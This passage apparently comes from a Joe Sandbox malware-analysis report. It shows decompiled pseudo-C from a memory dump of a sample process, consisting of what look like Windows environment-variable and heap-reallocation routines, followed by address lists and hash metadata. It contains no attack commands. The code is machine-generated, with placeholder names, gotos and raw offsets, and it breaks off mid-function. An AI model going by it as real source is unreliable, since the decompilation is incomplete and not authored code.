				void* _t420;
				void* _t422;
				signed int _t424;
				signed int _t425;
				intOrPtr _t427;
				void* _t428;
				void* _t432;
				void* _t435;
				void* _t437;
				signed short _t438;
				intOrPtr _t441;
				signed int _t442;
				void* _t443;
				void* _t444;
				void* _t446;

				_push(0xfffffffe);
				_push(0x3296c5a8);
				_push(0x328dad20);
				_push( *[fs:0x0]);
				_t444 = _t443 - 0x54;
				_t232 =  *0x3298b370;
				_v12 = _v12 ^ _t232;
				_push(_t232 ^ _t442);
				 *[fs:0x0] =  &_v20;
				_v56 = 0;
				_v84 = 0;
				_v29 = 0;
				_v30 = 0;
				_t389 = _a12;
				if(_t389 == 0) {
					L120:
					_t235 = 0xc000000d;
					L66:
					 *[fs:0x0] = _v20;
					return _t235;
				}
				_t339 = _a8;
				if( *_t339 == 0) {
					goto L120;
				} else {
					_t236 = 1;
					while(_t236 < _t389) {
						_t388 =  *(_t339 + _t236 * 2) & 0x0000ffff;
						if(_t388 == 0 || _t388 == 0x3d) {
							goto L120;
						} else {
							_t236 = _t236 + 1;
							_t339 = _a8;
							continue;
						}
					}
					_t340 = _a16;
					__eflags = _t340;
					if(_t340 == 0) {
						L12:
						_t238 =  *( *[fs:0x18] + 0x30);
						_t327 =  *((intOrPtr*)(_t238 + 0x10));
						_v48 = _t327;
						_v100 = _t327;
						_v68 = 0;
						_t414 = 0;
						_v44 = 0;
						_t341 = _a4;
						__eflags = _t341;
						if(_t341 != 0) {
							_t342 =  *_t341;
							_v36 = _t342;
							__eflags =  *(_t327 + 0x48) - _t342;
							if( *(_t327 + 0x48) != _t342) {
								goto L14;
							}
							_t238 =  *(_t238 + 0x1c);
							__eflags = _t238;
							if(_t238 == 0) {
								L104:
								_v29 = 1;
								goto L14;
							} else {
								_t238 = E328B2180(_t238);
								_t342 = _v36;
								__eflags = _t238;
								if(_t238 == 0) {
									goto L14;
								}
								goto L104;
							}
						} else {
							_v30 = 1;
							_v29 = 1;
							_t238 = E3289FED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							_t342 =  *(_t327 + 0x48);
							_v36 = _t342;
							_t414 = _v44;
							L14:
							_v8 = 0;
							_t400 = _t342;
							_v40 = _t400;
							_t328 = 0;
							_v52 = 0;
							__eflags = _t342;
							if(_t342 == 0) {
								L61:
								__eflags = _t414;
								if(_t414 != 0) {
									_t400 = _t414;
									_v40 = _t400;
								}
								__eflags = _t328;
								if(_t328 == 0) {
									__eflags = _a16;
									if(_a16 == 0) {
										goto L63;
									}
									__eflags = _t400;
									if(_t400 == 0) {
										_t415 = _a12;
										_t344 = _a20;
										_t241 = 6 + (_t415 + _t344) * 2;
										_t390 = 0;
										L75:
										_v60 = _t241;
										__eflags = _t241 - _t390;
										if(_t241 < _t390) {
											_t164 = _t344 + 2; // 0x2
											L328D8C00(_t400 + (_t164 + _t415) * 2, _t400, _t328 - _t400 & 0xfffffffe);
											_t416 = _t415 + _t415;
											E328D88C0(_t400, _a8, _t416);
											_t446 = _t444 + 0x18;
											_t329 = _v29;
											__eflags = _v29;
											if(_v29 != 0) {
												L328D8F40(0x329863a0, 0, 0x234);
												_t446 = _t446 + 0xc;
											}
											_t401 = _t400 + _t416;
											_v40 = _t401;
											 *_t401 = 0x3d;
											_t402 = _t401 + 2;
											_v40 = _t402;
											_t417 = _a20 + _a20;
											E328D88C0(_t402, _a16, _t417);
											_t403 = _t402 + _t417;
											_v40 = _t403;
											_t238 = 0;
											 *_t403 = 0;
											_v40 = _t403 + 2;
											__eflags = _a4;
											if(_a4 != 0) {
												goto L64;
											} else {
												_t343 = _v48;
												 *((intOrPtr*)(_t343 + 0x48)) = _v36;
												_t238 = _v60;
												 *((intOrPtr*)(_t343 + 0x290)) = _v60;
												 *((intOrPtr*)(_t343 + 0x294)) =  *((intOrPtr*)(_t343 + 0x294)) + 1;
												goto L65;
											}
										}
										_t346 = E328BB9FA(_t241);
										_v64 = _t346;
										__eflags = _t346;
										if(_t346 == 0) {
											L111:
											_v68 = 0xc000009a;
											goto L63;
										}
										__eflags = _t400;
										if(_t400 == 0) {
											_t418 = 0;
										} else {
											_t424 = _t400 - _v36;
											__eflags = _t424;
											_t418 = _t424 >> 1;
											E328D88C0(_t346, _v36, _t418 + _t418);
											_t444 = _t444 + 0xc;
											_t346 = _v64;
										}
										_v80 = _t346 + _t418 * 2;
										_t420 = _a12 + _a12;
										E328D88C0(_t346 + _t418 * 2, _a8, _t420);
										_t255 = _v80 + _t420;
										 *_t255 = 0x3d;
										_v80 = _t255 + 2;
										_t422 = _a20 + _a20;
										E328D88C0(_t255 + 2, _a16, _t422);
										_t259 = _v80 + _t422;
										 *_t259 = 0;
										_t260 = _t259 + 2;
										__eflags = _t400;
										if(_t400 == 0) {
											 *_t260 = 0;
											_t329 = _v29;
										} else {
											E328D88C0(_t260, _t400, _t328 - _t400 & 0xfffffffe);
											_t329 = _v29;
											__eflags = _v29;
											if(_v29 != 0) {
												L328D8F40(0x329863a0, 0, 0x234);
											}
										}
										_t350 = _a4;
										_t261 = _v64;
										__eflags = _t350;
										if(_t350 != 0) {
											 *_t350 = _t261;
										} else {
											_t350 = _v48;
											 *((intOrPtr*)(_t350 + 0x48)) = _t261;
											 *((intOrPtr*)(_t350 + 0x290)) = _v60;
											_t148 = _t350 + 0x294;
											 *_t148 =  *(_t350 + 0x294) + 1;
											__eflags =  *_t148;
										}
										__eflags = _v30;
										if(_v30 != 0) {
											_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
											E3289E740(_t350);
											_v30 = 0;
										}
										_t238 = E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v36);
										goto L64;
									}
									_v52 = _t400;
									while(1) {
										L70:
										_t270 =  *_t400 & 0x0000ffff;
										__eflags = _t270;
										if(_t270 == 0) {
											break;
										}
										while(1) {
											_t400 = _t400 + 2;
											_v52 = _t400;
											__eflags = _t270;
											if(_t270 == 0) {
												goto L70;
											}
											_t270 =  *_t400 & 0x0000ffff;
										}
									}
									_v52 = _t400 + 2;
									_t390 = E328BB870(_t342,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t342);
									_t328 = _v52;
									_t415 = _a12;
									_t355 = (_v52 - _v36 >> 1) + _t415 + _a20;
									__eflags = _t355;
									_t241 = 4 + _t355 * 2;
									_t400 = _v40;
									_t344 = _a20;
									goto L75;
								} else {
									L63:
									_t329 = _v29;
									L64:
									_t343 = _v48;
									L65:
									_v8 = 0xfffffffe;
									E328BB839(_t238, _t329, _t343);
									_t235 = _v68;
									goto L66;
								}
							}
							_t238 = _v84;
							_v80 = _v84;
							while(1) {
								L16:
								__eflags =  *_t400 - _t328;
								if( *_t400 == _t328) {
									break;
								}
								_t392 = _t400;
								_v92 = _t392;
								_t425 = 0;
								__eflags = 0;
								_v88 = 0;
								while(1) {
									_t400 = _t400 + 2;
									_v40 = _t400;
									_t273 =  *_t400 & 0x0000ffff;
									__eflags = _t273;
									if(_t273 == 0) {
										break;
									}
									__eflags = _t273 - 0x3d;
									if(_t273 != 0x3d) {
										continue;
									}
									_t425 = _t400 - _t392 >> 1;
									_v88 = _t425;
									_t400 = _t400 + 2;
									__eflags = _t400;
									_v40 = _t400;
									_t322 = _t400;
									_v56 = _t322;
									while(1) {
										__eflags =  *_t400 - _t328;
										if( *_t400 == _t328) {
											break;
										}
										_t400 = _t400 + 2;
										_v40 = _t400;
									}
									_t374 = _t400 - _t322;
									__eflags = _t374;
									_t375 = _t374 >> 1;
									_v80 = _t375;
									_v84 = _t375;
									break;
								}
								_t400 = _t400 + 2;
								_v40 = _t400;
								_t238 = _a8;
								_v72 = _t238;
								_v76 = _t392;
								_t356 = _a12;
								__eflags = _t356 - _t425;
								if(_t356 > _t425) {
									_t356 = _t425;
								}
								_t357 = _t238 + _t356 * 2;
								_v96 = _t357;
								while(1) {
									__eflags = _t238 - _t357;
									if(_t238 >= _t357) {
										break;
									}
									_v60 =  *_t238 & 0x0000ffff;
									_v64 =  *_t392 & 0x0000ffff;
									_t378 = _v60;
									_v32 = _t378;
									_t438 = _v64;
									__eflags = _t378 - _t438;
									if(_t378 == _t438) {
										L37:
										_t238 = _t238 + 2;
										_v72 = _t238;
										_t392 = _t392 + 2;
										_v76 = _t392;
										_t357 = _v96;
										continue;
									}
									__eflags = _t378 - 0x61;
									if(_t378 >= 0x61) {
										__eflags = _t378 - 0x7a;
										if(_t378 > 0x7a) {
											__eflags =  *0x32986914 - _t328; // 0x7ffd0654
											if(__eflags == 0) {
												goto L30;
											}
											_v60 = 0xc0;
											__eflags = _t378 - _v60;
											if(_t378 < _v60) {
												goto L30;
											}
											_t384 =  *0x32986914; // 0x7ffd0654
											_t319 =  *0x32986914; // 0x7ffd0654
											_t397 =  *0x32986914; // 0x7ffd0654
											_t378 = _v32 +  *((intOrPtr*)(_t397 + (( *(_t319 + (( *(_t384 + ((_t378 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t378 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t378 & 0xf)) * 2));
											_t238 = _v72;
											_t392 = _v76;
											L42:
											_v32 = _t378;
											goto L30;
										}
										_t66 =  &_v60;
										 *_t66 = _v60 + 0xffe0;
										__eflags =  *_t66;
										_t378 = _v60;
										goto L42;
									}
									L30:
									__eflags = _t438 - 0x61;
									if(_t438 >= 0x61) {
										__eflags = _t438 - 0x7a;
										if(_t438 > 0x7a) {
											__eflags =  *0x32986914 - _t328; // 0x7ffd0654
											if(__eflags != 0) {
												_v64 = 0xc0;
												__eflags = _t438 - _v64;
												if(_t438 >= _v64) {
													_t380 =  *0x32986914; // 0x7ffd0654
													_t311 =  *0x32986914; // 0x7ffd0654
													_t383 =  *0x32986914; // 0x7ffd0654
													_t438 = _t438 +  *((intOrPtr*)(_t383 + (( *(_t311 + (( *(_t380 + ((_t438 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t438 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t438 & 0xf)) * 2));
													_t378 = _v32;
													_t238 = _v72;
													_t392 = _v76;
												}
											}
										} else {
											_v64 = _v64 + 0xffe0;
											_t438 = _v64;
										}
									}
									__eflags = _t378 - _t438;
									if(_t378 == _t438) {
										goto L37;
									} else {
										_t238 = _t438 & 0x0000ffff;
										_t359 = (_t378 & 0x0000ffff) - (_t438 & 0x0000ffff);
										__eflags = _t359;
										L33:
										__eflags = _t359;
										if(__eflags == 0) {
											_t334 = _t400;
											_v52 = _t334;
											while(1) {
												L45:
												_t274 =  *_t334 & 0x0000ffff;
												__eflags = _t274;
												if(_t274 == 0) {
													break;
												}
												while(1) {
													_t334 =  &(_t334[1]);
													_v52 = _t334;
													__eflags = _t274;
													if(_t274 == 0) {
														goto L45;
													}
													_t274 =  *_t334 & 0x0000ffff;
												}
											}
											_t328 =  &(_t334[1]);
											_v52 = _t328;
											_t275 = _a16;
											__eflags = _t275;
											if(_t275 == 0) {
												_push(_t328 - _t400 & 0xfffffffe);
												_push(_t400);
												_push(_v92);
												L90:
												_t238 = L328D8C00();
												_t444 = _t444 + 0xc;
												L91:
												__eflags = _v29;
												if(_v29 != 0) {
													_t238 = L328D8F40(0x329863a0, 0, 0x234);
													_t444 = _t444 + 0xc;
												}
												goto L60;
											}
											_t427 = _a20;
											__eflags = _t427 - _v80;
											if(_t427 <= _v80) {
												_t428 = _t427 + _t427;
												E328D88C0(_v56, _t275, _t428);
												_t444 = _t444 + 0xc;
												_t361 = _v56 + _t428;
												_t238 = 0;
												 *_t361 = 0;
												_t362 = _t361 + 2;
												__eflags = _a20 - _v80;
												if(_a20 == _v80) {
													goto L91;
												}
												_t282 = _t328 - _t400 & 0xfffffffe;
												__eflags = _t282;
												_push(_t282);
												_push(_t400);
												_push(_t362);
												goto L90;
											}
											_t406 = _v36;
											_t284 = E328BB870(_t359,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t406);
											_t328 = _v52;
											_t368 = (_t328 - _t406 >> 1) - _v84 + _t427 + (_t328 - _t406 >> 1) - _v84 + _t427;
											_v80 = _t368;
											__eflags = _t368 - _t284;
											if(_t368 < _t284) {
												_t432 = _v56 + 2 + _t427 + _t427;
												_v88 = _v40;
												L328D8C00(_t432, _v40, _t328 - _v40 & 0xfffffffe);
												 *((short*)(_t432 - 2)) = 0;
												_t238 = E328D88C0(_t432 - 2 - _t427 + _t427, _a16, _t427 + _t427);
												_t444 = _t444 + 0x18;
												__eflags = _a4;
												if(_a4 == 0) {
													_t370 = _v48;
													 *((intOrPtr*)(_t370 + 0x48)) = _v36;
													_t238 = _v80;
													 *((intOrPtr*)(_t370 + 0x290)) = _v80;
													_t221 = _t370 + 0x294;
													 *_t221 =  *(_t370 + 0x294) + 1;
													__eflags =  *_t221;
												}
												__eflags = _v29;
												if(_v29 != 0) {
													_t238 = L328D8F40(0x329863a0, 0, 0x234);
													_t444 = _t444 + 0xc;
												}
												_t400 = _v88;
												goto L60;
											}
											_t408 = E328BB9FA(_t368);
											_v88 = _t408;
											__eflags = _t408;
											if(_t408 == 0) {
												goto L111;
											}
											_t435 = (_v56 - _v36 >> 1) + (_v56 - _v36 >> 1);
											E328D88C0(_t408, _v36, _t435);
											_t409 = _t408 + _t435;
											_t437 = _a20 + _a20;
											E328D88C0(_t409, _a16, _t437);
											 *((short*)(_t409 + _t437)) = 0;
											E328D88C0(_t409 + _t437 + 2, _v40, _t328 - _v40 & 0xfffffffe);
											_t444 = _t444 + 0x24;
											_t372 = _a4;
											_t299 = _v88;
											__eflags = _t372;
											if(_t372 != 0) {
												 *_t372 = _t299;
											} else {
												_t372 = _v48;
												 *((intOrPtr*)(_t372 + 0x48)) = _t299;
												 *(_t372 + 0x290) = _v80;
												_t96 = _t372 + 0x294;
												 *_t96 =  *(_t372 + 0x294) + 1;
												__eflags =  *_t96;
											}
											__eflags = _v29;
											if(_v29 != 0) {
												L328D8F40(0x329863a0, 0, 0x234);
												_t444 = _t444 + 0xc;
											}
											__eflags = _v30;
											if(_v30 != 0) {
												_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
												E3289E740(_t372);
												_v30 = 0;
											}
											_t238 = E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v36);
											_t400 = _v40;
											_t328 = _v52;
											goto L60;
										}
										if(__eflags < 0) {
											__eflags = _v44 - _t328;
											if(_v44 == _t328) {
												_t238 = _v92;
												_v44 = _v92;
											}
										}
										goto L16;
									}
								}
								_t359 = _a12 - _v88;
								goto L33;
							}
							L60:
							_t342 = _v36;
							_t414 = _v44;
							goto L61;
						}
					} else {
						_t324 = 0;
						__eflags = 0;
						_t441 = _a20;
						while(1) {
							__eflags = _t324 - _t441;
							if(_t324 >= _t441) {
								goto L12;
							}
							__eflags =  *((short*)(_t340 + _t324 * 2));
							if( *((short*)(_t340 + _t324 * 2)) == 0) {
								goto L120;
							} else {
								_t324 = _t324 + 1;
								continue;
							}
						}
						goto L12;
					}
				}
			}

0x328bb1e5
0x328bb1e7
0x328bb1ec
0x328bb1f7
0x328bb1f8
0x328bb1fe
0x328bb203
0x328bb208
0x328bb20c
0x328bb212
0x328bb219
0x328bb220
0x328bb224
0x328bb228
0x328bb22d
0x328fe41b
0x328fe41b
0x328bb57d
0x328bb580
0x328bb58e
0x328bb58e
0x328bb233
0x328bb23a
0x00000000
0x328bb240
0x328bb240
0x328bb245
0x328bb249
0x328bb250
0x00000000
0x328bb25f
0x328bb25f
0x328bb260
0x00000000
0x328bb260
0x328bb250
0x328bb265
0x328bb268
0x328bb26a
0x328bb283
0x328bb289
0x328bb28c
0x328bb28f
0x328bb292
0x328bb295
0x328bb29c
0x328bb29e
0x328bb2a1
0x328bb2a4
0x328bb2a6
0x328bb76c
0x328bb76e
0x328bb771
0x328bb774
0x00000000
0x00000000
0x328fe27e
0x328fe281
0x328fe283
0x328fe296
0x328fe296
0x00000000
0x328fe285
0x328fe286
0x328fe28b
0x328fe28e
0x328fe290
0x00000000
0x00000000
0x00000000
0x328fe290
0x328bb2ac
0x328bb2ac
0x328bb2b0
0x328bb2bd
0x328bb2c2
0x328bb2c5
0x328bb2c8
0x328bb2cb
0x328bb2cb
0x328bb2d2
0x328bb2d4
0x328bb2d7
0x328bb2d9
0x328bb2dc
0x328bb2de
0x328bb55c
0x328bb55c
0x328bb55e
0x328bb709
0x328bb70b
0x328bb70b
0x328bb564
0x328bb566
0x328bb591
0x328bb595
0x00000000
0x00000000
0x328bb597
0x328bb599
0x328fe3e5
0x328fe3e8
0x328fe3ee
0x328fe3f5
0x328bb5f8
0x328bb5f8
0x328bb5fb
0x328bb5fd
0x328bb79b
0x328bb7ab
0x328bb7b3
0x328bb7ba
0x328bb7bf
0x328bb7c2
0x328bb7c5
0x328bb7c7
0x328bb7d5
0x328bb7da
0x328bb7da
0x328bb7dd
0x328bb7df
0x328bb7e7
0x328bb7ea
0x328bb7ed
0x328bb7f3
0x328bb7fb
0x328bb803
0x328bb805
0x328bb808
0x328bb80a
0x328bb810
0x328bb813
0x328bb816
0x00000000
0x328bb81c
0x328bb81c
0x328bb822
0x328bb825
0x328bb828
0x328bb82e
0x00000000
0x328bb82e
0x328bb816
0x328bb60a
0x328bb60c
0x328bb60f
0x328bb611
0x328fe35f
0x328fe35f
0x00000000
0x328fe35f
0x328bb617
0x328bb619
0x328fe3fc
0x328bb61f
0x328bb624
0x328bb624
0x328bb626
0x328bb62e
0x328bb633
0x328bb636
0x328bb636
0x328bb63c
0x328bb642
0x328bb649
0x328bb654
0x328bb65b
0x328bb661
0x328bb667
0x328bb66e
0x328bb679
0x328bb67d
0x328bb680
0x328bb683
0x328bb685
0x328fe405
0x328fe408
0x328bb68b
0x328bb693
0x328bb69b
0x328bb69e
0x328bb6a0
0x328bb6ae
0x328bb6b3
0x328bb6a0
0x328bb6b6
0x328bb6b9
0x328bb6bc
0x328bb6be
0x328bb77f
0x328bb6c4
0x328bb6c4
0x328bb6c7
0x328bb6cd
0x328bb6d3
0x328bb6d3
0x328bb6d3
0x328bb6d3
0x328bb6d9
0x328bb6dd
0x328bb6e5
0x328bb6e8
0x328bb6ed
0x328bb6ed
0x328bb6ff
0x00000000
0x328bb6ff
0x328bb59f
0x328bb5a2
0x328bb5a2
0x328bb5a2
0x328bb5a5
0x328bb5a8
0x00000000
0x00000000
0x328bb5b0
0x328bb5b0
0x328bb5b3
0x328bb5b6
0x328bb5b9
0x00000000
0x00000000
0x328bb5bb
0x328bb5bb
0x328bb5b0
0x328bb5c3
0x328bb5d7
0x328bb5d9
0x328bb5e3
0x328bb5e8
0x328bb5e8
0x328bb5eb
0x328bb5f2
0x328bb5f5
0x00000000
0x328bb568
0x328bb568
0x328bb568
0x328bb56b
0x328bb56b
0x328bb56e
0x328bb56e
0x328bb575
0x328bb57a
0x00000000
0x328bb57a
0x328bb566
0x328bb2e4
0x328bb2e7
0x328bb2f0
0x328bb2f0
0x328bb2f0
0x328bb2f3
0x00000000
0x00000000
0x328bb2f9
0x328bb2fb
0x328bb2fe
0x328bb2fe
0x328bb300
0x328bb303
0x328bb303
0x328bb306
0x328bb309
0x328bb30c
0x328bb30f
0x00000000
0x00000000
0x328bb311
0x328bb314
0x00000000
0x00000000
0x328bb31a
0x328bb31c
0x328bb31f
0x328bb31f
0x328bb322
0x328bb325
0x328bb327
0x328bb330
0x328bb330
0x328bb333
0x00000000
0x00000000
0x328bb335
0x328bb338
0x328bb338
0x328bb33f
0x328bb33f
0x328bb341
0x328bb343
0x328bb346
0x00000000
0x328bb346
0x328bb349
0x328bb34c
0x328bb34f
0x328bb352
0x328bb355
0x328bb358
0x328bb35b
0x328bb35d
0x328bb35f
0x328bb35f
0x328bb363
0x328bb366
0x328bb370
0x328bb370
0x328bb372
0x00000000
0x00000000
0x328bb37b
0x328bb381
0x328bb384
0x328bb388
0x328bb38c
0x328bb390
0x328bb393
0x328bb3cc
0x328bb3cc
0x328bb3cf
0x328bb3d2
0x328bb3d5
0x328bb3d8
0x00000000
0x328bb3d8
0x328bb395
0x328bb399
0x328bb3f4
0x328bb3f8
0x328fe29f
0x328fe2a5
0x00000000
0x00000000
0x328fe2ab
0x328fe2b2
0x328fe2b6
0x00000000
0x00000000
0x328fe2c4
0x328fe2d8
0x328fe2ea
0x328fe2f0
0x328fe2f4
0x328fe2f7
0x328bb409
0x328bb409
0x00000000
0x328bb409
0x328bb3fe
0x328bb3fe
0x328bb3fe
0x328bb405
0x00000000
0x328bb405
0x328bb39b
0x328bb39b
0x328bb39f
0x328bb3dd
0x328bb3e1
0x328fe2ff
0x328fe305
0x328fe30b
0x328fe312
0x328fe316
0x328fe324
0x328fe338
0x328fe346
0x328fe34c
0x328fe350
0x328fe354
0x328fe357
0x328fe357
0x328fe316
0x328bb3e7
0x328bb3e7
0x328bb3ee
0x328bb3ee
0x328bb3e1
0x328bb3a1
0x328bb3a4
0x00000000
0x328bb3a6
0x328bb3a6
0x328bb3ac
0x328bb3ac
0x328bb3ae
0x328bb3ae
0x328bb3b0
0x328bb417
0x328bb419
0x328bb420
0x328bb420
0x328bb420
0x328bb423
0x328bb426
0x00000000
0x00000000
0x328bb430
0x328bb430
0x328bb433
0x328bb436
0x328bb439
0x00000000
0x00000000
0x328bb43b
0x328bb43b
0x328bb430
0x328bb440
0x328bb443
0x328bb446
0x328bb449
0x328bb44b
0x328bb78d
0x328bb78e
0x328bb78f
0x328bb741
0x328bb741
0x328bb746
0x328bb749
0x328bb749
0x328bb74d
0x328bb75f
0x328bb764
0x328bb764
0x00000000
0x328bb74d
0x328bb451
0x328bb454
0x328bb457
0x328bb713
0x328bb71a
0x328bb71f
0x328bb725
0x328bb727
0x328bb729
0x328bb72c
0x328bb732
0x328bb735
0x00000000
0x00000000
0x328bb73b
0x328bb73b
0x328bb73e
0x328bb73f
0x328bb740
0x00000000
0x328bb740
0x328bb45d
0x328bb46c
0x328bb471
0x328bb47f
0x328bb481
0x328bb484
0x328bb486
0x328fe374
0x328fe37b
0x328fe386
0x328fe393
0x328fe39d
0x328fe3a2
0x328fe3a5
0x328fe3a9
0x328fe3ab
0x328fe3b1
0x328fe3b4
0x328fe3b7
0x328fe3bd
0x328fe3bd
0x328fe3bd
0x328fe3bd
0x328fe3c3
0x328fe3c7
0x328fe3d5
0x328fe3da
0x328fe3da
0x328fe3dd
0x00000000
0x328fe3dd
0x328bb491
0x328bb493
0x328bb496
0x328bb498
0x00000000
0x00000000
0x328bb4a8
0x328bb4ae
0x328bb4b6
0x328bb4bb
0x328bb4c2
0x328bb4ce
0x328bb4df
0x328bb4e4
0x328bb4e7
0x328bb4ea
0x328bb4ed
0x328bb4ef
0x328bb794
0x328bb4f5
0x328bb4f5
0x328bb4f8
0x328bb4fe
0x328bb504
0x328bb504
0x328bb504
0x328bb504
0x328bb50a
0x328bb50e
0x328bb51c
0x328bb521
0x328bb521
0x328bb524
0x328bb528
0x328bb530
0x328bb533
0x328bb538
0x328bb538
0x328bb54b
0x328bb550
0x328bb553
0x00000000
0x328bb553
0x328bb3b2
0x328bb3b8
0x328bb3bb
0x328bb3c1
0x328bb3c4
0x328bb3c4
0x328bb3bb
0x00000000
0x328bb3b2
0x328bb3a4
0x328bb412
0x00000000
0x328bb412
0x328bb556
0x328bb556
0x328bb559
0x00000000
0x328bb559
0x328bb26c
0x328bb26c
0x328bb26c
0x328bb26e
0x328bb271
0x328bb271
0x328bb273
0x00000000
0x00000000
0x328bb275
0x328bb27a
0x00000000
0x328bb280
0x328bb280
0x00000000
0x328bb280
0x328bb27a
0x00000000
0x328bb271
0x328bb26a

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a256f5ab4944a4c24fc6637c272e95bae88c2cbbe12b5b59808c707f621f04
Instruction ID: 86189b033605200675844c7cd2ba5e4fb38ef241c4bca2e83be8567147027757
Opcode Fuzzy Hash: 41a256f5ab4944a4c24fc6637c272e95bae88c2cbbe12b5b59808c707f621f04
Instruction Fuzzy Hash: 87326CB9E01259DBDF14CF98D890BAEBBB1FF58744F18002DE815AB390EB759941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 328A2760 Relevance: .6, Instructions: 605
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E328A2760(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				signed char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed char _v100;
				signed char _v101;
				signed int _v108;
				signed char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v124;
				signed char _v128;
				signed int _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				void* _t234;
				intOrPtr _t237;
				signed int _t242;
				signed int _t245;
				signed char _t246;
				intOrPtr _t250;
				signed short _t254;
				signed int _t256;
				signed char _t260;
				void* _t264;
				signed char _t266;
				intOrPtr* _t268;
				signed char _t271;
				signed int _t272;
				signed short _t275;
				signed short _t278;
				signed short _t279;
				signed int _t284;
				signed short _t285;
				signed int _t287;
				void* _t288;
				signed short _t289;
				signed int _t291;
				void* _t292;
				signed char _t297;
				signed short _t299;
				signed char _t301;
				signed short _t320;
				signed short _t322;
				signed short _t323;
				signed int _t325;
				void* _t326;
				signed char _t330;
				signed int _t334;
				signed int _t335;
				void* _t337;
				signed char _t343;
				signed int _t345;
				intOrPtr _t352;
				signed int _t361;
				signed char _t363;
				signed int _t364;
				signed char _t365;
				unsigned int _t370;
				signed int _t374;
				signed char _t378;
				void* _t385;
				signed int _t387;
				signed char _t388;
				signed int _t390;
				signed int _t391;
				signed short _t396;
				signed int _t398;
				signed char _t399;
				unsigned int _t407;
				unsigned int _t409;
				unsigned int _t411;
				unsigned int _t421;
				unsigned int _t424;
				void* _t429;
				signed char _t430;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				void* _t439;
				void* _t445;

				_t386 = __edx;
				_t337 = _t445;
				_v8 =  *((intOrPtr*)(_t337 + 4));
				_t443 = (_t445 - 0x00000008 & 0xfffffff8) + 4;
				_v16 =  *0x3298b370 ^ (_t445 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_t437 = __ecx;
				_v124 =  *(_t337 + 0xc);
				_t339 =  *(_t337 + 8);
				_t226 =  *(_t337 + 0x10);
				_v112 = _t339;
				_v132 = _t226;
				_v120 = 0;
				_v116 = 0;
				_t428 =  *(_t337 + 0x14);
				_v128 = _t428;
				if(_t339 == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E328BABA0(0);
					L150:
					_t229 = 0;
					L19:
					_pop(_t429);
					_pop(_t439);
					return E328D4B50(_t229, _t337, _v16 ^ _t443, _t386, _t429, _t439);
				}
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t387 = E3293D8D2(__edx);
					_t232 =  *(__ecx + 0xb0);
					_v108 = _t387;
					__eflags = _t232;
					if(_t232 != 0) {
						_t352 =  *[fs:0x18];
						__eflags = _t232 -  *((intOrPtr*)(_t352 + 0x24));
						if(_t232 ==  *((intOrPtr*)(_t352 + 0x24))) {
							_t390 = _t387 | 0x00000001;
							__eflags = _t390;
							_v108 = _t390;
						}
					}
					__eflags =  *0x329838c0 & 0x00000002;
					_t430 = _v112;
					_t343 = _t430;
					if(( *0x329838c0 & 0x00000002) == 0) {
						_t233 = 0;
						__eflags = 0;
					} else {
						_t233 =  *((intOrPtr*)(_t430 - 8));
						_t343 = _t343 - _t233;
					}
					_t388 = _v108;
					_v120 = _t233;
					_t234 = _t233 + _v124;
					__eflags = _t234 - _v124;
					if(_t234 >= _v124) {
						_t345 = E3295970B(_t437, _t388, _t343, _t234, _v132, _v128);
						_v116 = _t345;
						__eflags = _t345;
						if(_t345 == 0) {
							goto L33;
						}
						__eflags = _t345 - 0xffffffff;
						if(_t345 == 0xffffffff) {
							goto L33;
						} else {
							__eflags =  *0x329838c0 & 0x00000002;
							_t386 = _v120;
							if(( *0x329838c0 & 0x00000002) != 0) {
								 *(_t345 + _t386 - 8) = _t386;
								_t246 = _t345 + _t386;
								__eflags = _t386 - 8;
								if(_t386 > 8) {
									 *_t345 = _t386;
								}
								_v116 = _t246;
							}
							_t245 = _v132;
							__eflags = _t245;
							if(_t245 != 0) {
								 *_t245 =  *_t245 - _t386;
							}
							goto L37;
						}
					} else {
						_t345 = 0;
						__eflags = 0;
						L33:
						asm("sbb ecx, ecx");
						_t55 = ( ~_t345 & 0xffffffee) - 0x3fffffe9; // -1073741801
						_t386 = _t55;
						_v128 = _t386;
						_v116 = 0;
						 *( *[fs:0x18] + 0xbf4) = _t386;
						_t237 = E328BABA0(_t386);
						__eflags = _v108;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t237;
						if(_v108 < 0) {
							L35:
							_v100 = _v128;
							_v80 = _v124;
							_push( &_v100);
							_v92 = 0;
							_v84 = 1;
							_v96 = 0;
							_v88 = E328E8A60;
							E328E8A60(0, _t386);
							L36:
							_t430 = _v112;
							L37:
							_t242 = L328A3C20(_t437);
							__eflags = _t242;
							_t229 = _v116;
							if(_t242 != 0) {
								__eflags = _t229;
								if(_t229 != 0) {
